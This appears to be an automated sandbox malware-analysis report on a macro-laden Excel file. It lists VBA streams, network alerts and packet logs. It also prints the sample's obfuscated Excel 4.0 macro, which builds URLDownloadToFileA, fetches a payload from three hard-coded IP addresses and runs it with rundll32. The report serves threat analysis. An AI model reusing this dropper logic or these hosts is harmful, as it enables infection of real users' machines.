                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-18:21:56.395949TCP1201ATTACK-RESPONSES 403 Forbidden804916791.211.91.81192.168.2.22
                                                                                                                                                05/04/21-18:21:57.137581TCP1201ATTACK-RESPONSES 403 Forbidden80491685.34.179.36192.168.2.22
                                                                                                                                                05/04/21-18:21:57.348727TCP1201ATTACK-RESPONSES 403 Forbidden804916945.153.229.23192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:27:40.941601038 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:27:41.027003050 CEST804972091.211.91.81192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.030467987 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:27:41.030962944 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:27:41.114449024 CEST804972091.211.91.81192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.178436995 CEST804972091.211.91.81192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.178531885 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:27:41.228804111 CEST4972280192.168.2.65.34.179.36
                                                                                                                                                May 4, 2021 18:27:41.373819113 CEST80497225.34.179.36192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.373986006 CEST4972280192.168.2.65.34.179.36
                                                                                                                                                May 4, 2021 18:27:41.374579906 CEST4972280192.168.2.65.34.179.36
